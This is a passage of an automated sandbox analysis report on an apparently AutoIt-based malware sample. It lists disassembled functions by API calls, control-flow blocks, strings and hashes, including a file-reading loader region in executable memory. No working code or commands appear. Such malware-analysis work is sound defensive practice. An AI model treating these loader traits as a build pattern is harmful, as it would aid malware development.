                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
                          • Instruction ID: 0af0ad0515d27515a00041bfc374052d2c8895a88b266e2067257e2f11f99890
                          • Opcode Fuzzy Hash: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
                          • Instruction Fuzzy Hash: B9A12632A04118CFDF19AF78D855BAE7BB0EB06320F24415EF9159B292D7399D12CBD2

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78
                            • Part of subcall function 00703357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00703379
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0070356A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0074318D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007431CE
                          • RegCloseKey.ADVAPI32(?), ref: 00743210
                          • _wcslen.LIBCMT ref: 00743277
                          • _wcslen.LIBCMT ref: 00743286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 98802146-2727554177
                          • Opcode ID: 3baae5f98198f770e19fd81e1da833698502b9c871e203ad7f619884ba8ce6bb
                          • Instruction ID: 9da94b0131ce0503e3500214857364d531172c3f5f02bb83b9c3cbb5f4386c8d
                          • Opcode Fuzzy Hash: 3baae5f98198f770e19fd81e1da833698502b9c871e203ad7f619884ba8ce6bb
                          • Instruction Fuzzy Hash: 31718D71505301EEC704EF29EC8585BBBF8BF94340F40852EF545831A2EB7C9A4ACB65

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00702B8E
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00702B9D
                          • LoadIconW.USER32(00000063), ref: 00702BB3
                          • LoadIconW.USER32(000000A4), ref: 00702BC5
                          • LoadIconW.USER32(000000A2), ref: 00702BD7
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00702BEF
                          • RegisterClassExW.USER32(?), ref: 00702C40
                            • Part of subcall function 00702CD4: GetSysColorBrush.USER32(0000000F), ref: 00702D07
                            • Part of subcall function 00702CD4: RegisterClassExW.USER32(00000030), ref: 00702D31
                            • Part of subcall function 00702CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00702D42
                            • Part of subcall function 00702CD4: InitCommonControlsEx.COMCTL32(?), ref: 00702D5F
                            • Part of subcall function 00702CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00702D6F
                            • Part of subcall function 00702CD4: LoadIconW.USER32(000000A9), ref: 00702D85
                            • Part of subcall function 00702CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00702D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
                          • Instruction ID: 413df99bf573e4344f6ec95b8858ec5d5fcde52eceb32d0ba899cdbec52bbf17
                          • Opcode Fuzzy Hash: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
                          • Instruction Fuzzy Hash: 22214C70E02318BBDB119FE5EC59A9D7FB4FB08B50F80812BE500A66A0D3B90540CF98
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0070BB4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: p#}$p#}$p#}$p#}$p%}$p%}$x#}$x#}
                          • API String ID: 1385522511-210118448
                          • Opcode ID: d667d102355362c0b29bafc7b183dd1c5d7c111f275afaa00fb581f1875d4f97
                          • Instruction ID: ec605d7e78951ede8b2736d1e6128005d5eb667a293a9917f8ed8b26e22ae3ba
                          • Opcode Fuzzy Hash: d667d102355362c0b29bafc7b183dd1c5d7c111f275afaa00fb581f1875d4f97
                          • Instruction Fuzzy Hash: 7932B074A00209DFDB24DF54C894ABEB7F5EF44310F14815AED05AB2A1D7BCAE86CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 769 703170-703185 770 7031e5-7031e7 769->770 771 703187-70318a 769->771 770->771 774 7031e9 770->774 772 7031eb 771->772 773 70318c-703193 771->773 775 7031f1-7031f6 772->775 776 742dfb-742e23 call 7018e2 call 71e499 772->776 777 703265-70326d PostQuitMessage 773->777 778 703199-70319e 773->778 779 7031d0-7031d8 DefWindowProcW 774->779 780 7031f8-7031fb 775->780 781 70321d-703244 SetTimer RegisterWindowMessageW 775->781 815 742e28-742e2f 776->815 786 703219-70321b 777->786 783 7031a4-7031a8 778->783 784 742e7c-742e90 call 76bf30 778->784 785 7031de-7031e4 779->785 787 703201-703214 KillTimer call 7030f2 call 703c50 780->787 788 742d9c-742d9f 780->788 781->786 790 703246-703251 CreatePopupMenu 781->790 791 742e68-742e77 call 76c161 783->791 792 7031ae-7031b3 783->792 784->786 808 742e96 784->808 786->785 787->786 800 742dd7-742df6 MoveWindow 788->800 801 742da1-742da5 788->801 790->786 791->786 797 742e4d-742e54 792->797 798 7031b9-7031be 792->798 797->779 802 742e5a-742e63 call 760ad7 797->802 806 703253-703263 call 70326f 798->806 807 7031c4-7031ca 798->807 800->786 809 742dc6-742dd2 SetFocus 801->809 810 742da7-742daa 801->810 802->779 806->786 807->779 807->815 808->779 809->786 810->807 811 742db0-742dc1 call 7018e2 810->811 811->786 815->779 819 742e35-742e48 call 7030f2 call 703837 815->819 819->779
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0070316A,?,?), ref: 007031D8
                          • KillTimer.USER32(?,00000001,?,?,?,?,?,0070316A,?,?), ref: 00703204
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00703227
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0070316A,?,?), ref: 00703232
                          • CreatePopupMenu.USER32 ref: 00703246
                          • PostQuitMessage.USER32(00000000), ref: 00703267
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
                          • Instruction ID: 1d35d74cdbf6058ac79a1f25e85dcbea1277f05b101674796dfea7817679c5f4
                          • Opcode Fuzzy Hash: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
                          • Instruction Fuzzy Hash: 22412635240204FBDF155BB89C2DB793BADFB09340F848327F902862E2C77D9A4297A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: D%}$D%}$D%}$D%}$D%}D%}$Variable must be of type 'Object'.
                          • API String ID: 0-1073507847
                          • Opcode ID: 613ae8667d468ad0c77c7c65abf84e2fb4b36b7dd345c4f37ed10b2c28af909c
                          • Instruction ID: 673b823800580dc104de188e1d811510c6b7c24781d3604155f892d059a87102
                          • Opcode Fuzzy Hash: 613ae8667d468ad0c77c7c65abf84e2fb4b36b7dd345c4f37ed10b2c28af909c
                          • Instruction Fuzzy Hash: 6BC27F71A00215CFCB14CF58D884AADB7F1BF19310F248A69E955AB3E1D379ED82CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1335 2530920-2530972 call 2530820 CreateFileW 1338 2530974-2530976 1335->1338 1339 253097b-2530988 1335->1339 1340 2530ad4-2530ad8 1338->1340 1342 253099b-25309b2 VirtualAlloc 1339->1342 1343 253098a-2530996 1339->1343 1344 25309b4-25309b6 1342->1344 1345 25309bb-25309e1 CreateFileW 1342->1345 1343->1340 1344->1340 1347 25309e3-2530a00 1345->1347 1348 2530a05-2530a1f ReadFile 1345->1348 1347->1340 1349 2530a43-2530a47 1348->1349 1350 2530a21-2530a3e 1348->1350 1351 2530a49-2530a66 1349->1351 1352 2530a68-2530a7f WriteFile 1349->1352 1350->1340 1351->1340 1355 2530a81-2530aa8 1352->1355 1356 2530aaa-2530acf FindCloseChangeNotification VirtualFree 1352->1356 1355->1340 1356->1340
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02530965
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                          • Instruction ID: 47abc5cb5b34f5b40f23bc9579791b297fb3acbc55acf6b257801c67a89890ec
                          • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                          • Instruction Fuzzy Hash: 1C51E776A50208BBEB20DFA4CC59FDEBB78BF48700F108954F60AEA1C0DA749645CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1375 702c63-702cd3 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00702C91
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00702CB2
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CC6
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
                          • Instruction ID: 2589e3d7d6f0aa35f43ced9b8d33811eef524faaac327a9c776e8b769a732f72
                          • Opcode Fuzzy Hash: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
                          • Instruction Fuzzy Hash: CDF0DA756412907BEB311717BC08E772FBDD7C6F60B80805BF904A25A0C6691851DAB8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1490 772947-7729b9 call 741f50 call 7725d6 call 71fe0b call 705722 call 77274e call 70511f call 725232 1505 7729bf-7729c6 call 772e66 1490->1505 1506 772a6c-772a73 call 772e66 1490->1506 1511 772a75-772a77 1505->1511 1512 7729cc-772a6a call 72d583 call 724983 call 729038 call 72d583 call 729038 * 2 1505->1512 1506->1511 1513 772a7c 1506->1513 1514 772cb6-772cb7 1511->1514 1516 772a7f-772b3a call 7050f5 * 8 call 773017 call 72e5eb 1512->1516 1513->1516 1517 772cd5-772cdb 1514->1517 1555 772b43-772b5e call 772792 1516->1555 1556 772b3c-772b3e 1516->1556 1520 772cf0-772cf6 1517->1520 1521 772cdd-772ced call 71fdcd call 71fe14 1517->1521 1521->1520 1559 772b64-772b6c 1555->1559 1560 772bf0-772bfc call 72e678 1555->1560 1556->1514 1562 772b74 1559->1562 1563 772b6e-772b72 1559->1563 1567 772c12-772c16 1560->1567 1568 772bfe-772c0d DeleteFileW 1560->1568 1564 772b79-772b97 call 7050f5 1562->1564 1563->1564 1572 772bc1-772bd7 call 77211d call 72dbb3 1564->1572 1573 772b99-772b9e 1564->1573 1570 772c91-772ca5 CopyFileW 1567->1570 1571 772c18-772c7e call 7725d6 call 72d2eb * 2 call 7722ce 1567->1571 1568->1514 1575 772ca7-772cb4 DeleteFileW 1570->1575 1576 772cb9-772ccf DeleteFileW call 772fd8 1570->1576 1571->1576 1595 772c80-772c8f DeleteFileW 1571->1595 1590 772bdc-772be7 1572->1590 1578 772ba1-772bb4 call 7728d2 1573->1578 1575->1514 1581 772cd4 1576->1581 1588 772bb6-772bbf 1578->1588 1581->1517 1588->1572 1590->1559 1592 772bed 1590->1592 1592->1560 1595->1514
                          APIs
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772C05
                          • DeleteFileW.KERNEL32(?), ref: 00772C87
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00772C9D
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CAE
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$Delete$Copy
                          • String ID:
                          • API String ID: 3226157194-0
                          • Opcode ID: b5236c35a063276e326883eb05560788c63ccb8e3eea2ad7b4cfdebc50654e7e
                          • Instruction ID: f1d306269b4d32e498a3bf23df74bf377dad9d639fd6aa249857b291b213e278
                          • Opcode Fuzzy Hash: b5236c35a063276e326883eb05560788c63ccb8e3eea2ad7b4cfdebc50654e7e
                          • Instruction Fuzzy Hash: D3B171B1D00129EBDF21DFA4CC89EDE77BDEF49340F1080A6F519E6152EA389A458F61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1870 735aa9-735ace 1871 735ad0-735ad2 1870->1871 1872 735ad7-735ad9 1870->1872 1873 735ca5-735cb4 call 720a8c 1871->1873 1874 735adb-735af5 call 72f2c6 call 72f2d9 call 7327ec 1872->1874 1875 735afa-735b1f 1872->1875 1874->1873 1876 735b21-735b24 1875->1876 1877 735b26-735b2c 1875->1877 1876->1877 1880 735b4e-735b53 1876->1880 1881 735b4b 1877->1881 1882 735b2e-735b46 call 72f2c6 call 72f2d9 call 7327ec 1877->1882 1886 735b55-735b61 call 739424 1880->1886 1887 735b64-735b6d call 73564e 1880->1887 1881->1880 1921 735c9c-735c9f 1882->1921 1886->1887 1898 735ba8-735bba 1887->1898 1899 735b6f-735b71 1887->1899 1904 735c02-735c23 WriteFile 1898->1904 1905 735bbc-735bc2 1898->1905 1901 735b73-735b78 1899->1901 1902 735b95-735b9e call 73542e 1899->1902 1906 735b7e-735b8b call 7355e1 1901->1906 1907 735c6c-735c7e 1901->1907 1920 735ba3-735ba6 1902->1920 1910 735c25-735c2b GetLastError 1904->1910 1911 735c2e 1904->1911 1912 735bf2-735c00 call 7356c4 1905->1912 1913 735bc4-735bc7 1905->1913 1930 735b8e-735b90 1906->1930 1918 735c80-735c83 1907->1918 1919 735c89-735c99 call 72f2d9 call 72f2c6 1907->1919 1910->1911 1922 735c31-735c3c 1911->1922 1912->1920 1914 735be2-735bf0 call 735891 1913->1914 1915 735bc9-735bcc 1913->1915 1914->1920 1915->1907 1923 735bd2-735be0 call 7357a3 1915->1923 1918->1919 1928 735c85-735c87 1918->1928 1919->1921 1920->1930 1924 735ca4 1921->1924 1931 735ca1 1922->1931 1932 735c3e-735c43 1922->1932 1923->1920 1924->1873 1928->1924 1930->1922 1931->1924 1936 735c45-735c4a 1932->1936 1937 735c69 1932->1937 1938 735c60-735c67 call 72f2a3 1936->1938 1939 735c4c-735c5e call 72f2d9 call 72f2c6 1936->1939 1937->1907 1938->1921 1939->1921
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: JOp
                          • API String ID: 0-2779313138
                          • Opcode ID: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
                          • Instruction ID: b85bfcaefd4026abe9a8cb730bafb1d34bf68964b3aae29133eb9515e03da63f
                          • Opcode Fuzzy Hash: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
                          • Instruction Fuzzy Hash: A951AFB1D0061AEFEB219FA4D849FEEBBB8AF06314F14015AF405A7293D73D99018B71

                          Control-flow Graph (rendered graph not reproduced; the Executed / Not Executed colouring is lost): basic blocks 25323c0 through 25325a3. The entry block 25323c0-25324cc calls 2530000, 25322b0 and CreateFileW; 25324ea-2532504 calls VirtualAlloc; 253250b-2532522 calls ReadFile; the remaining blocks call 2531070, 25322f0, 2532060 and 2532340 before reaching the exit block 253259e-25325a3.
                          APIs
                            • Part of subcall function 025322B0: Sleep.KERNELBASE(000001F4), ref: 025322C1
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025324C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: J7D986WGK7DX18P
                          • API String ID: 2694422964-658706119
                          • Opcode ID: f9718f6fe3f72f1caea4fe6591e19adeb490ce1f6d828344cdd4e578a749bd4f
                          • Instruction ID: ac200f742e383d05162f5f5d13c9f3ad9498601c13426d912d49f158e98b0311
                          • Opcode Fuzzy Hash: f9718f6fe3f72f1caea4fe6591e19adeb490ce1f6d828344cdd4e578a749bd4f
                          • Instruction Fuzzy Hash: A4517F71D04249DBEF11DBA4C914BEFBBB9AF48300F004199EA08BB2C0D7794B49CBA5
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B40
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B61
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B83
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
                          • Instruction ID: bd9dff7c2bcf0b86668e3cb6827feba11fdabb2f0dbce50b971c60cc354ce93b
                          • Opcode Fuzzy Hash: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
                          • Instruction Fuzzy Hash: 58112AB5510208FFDB21CFA9DC85AAEBBFCEF04748B10855AA805D7150E2359E459764
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007433A2
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00703A04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_wcslen
                          • String ID: Line:
                          • API String ID: 2289894680-1585850449
                          • Opcode ID: 47da5bc3211248bd29cc281826136151386fa7a967c73cda3fda07d6430c43bd
                          • Instruction ID: ed3a7753648e31e1b5f3614aa6c91926f8366e2cc8fa40504e1b6c4778d65c39
                          • Opcode Fuzzy Hash: 47da5bc3211248bd29cc281826136151386fa7a967c73cda3fda07d6430c43bd
                          • Instruction Fuzzy Hash: 9431C171509300EAC725EB24DC49BEBB7ECAF40714F408A2BF599821D1DB7CAA49C7C6
                          APIs
                          • GetOpenFileNameW.COMDLG32(?), ref: 00742C8C
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 00702DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00702DC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen
                          • String ID: X$`e|
                          • API String ID: 779396738-3909034667
                          • Opcode ID: 91408d900c14829e0daef670ad2838eb70f269fb46016cbc99c8ecd389daf1fc
                          • Instruction ID: a2a653a9cf0595833e47651f70e4157de6a4ae73a25846c02ac9c7941e11d5c5
                          • Opcode Fuzzy Hash: 91408d900c14829e0daef670ad2838eb70f269fb46016cbc99c8ecd389daf1fc
                          • Instruction Fuzzy Hash: 08219671A00298DBCB41EF94D849BDE7BFC9F49304F50805AE505A7282DBBC5A898B61
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00720668
                            • Part of subcall function 007232A4: RaiseException.KERNEL32(?,?,?,0072068A,?,007D1444,?,?,?,?,?,?,0072068A,00701129,007C8738,00701129), ref: 00723304
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00720685
                          Memory Dump Source
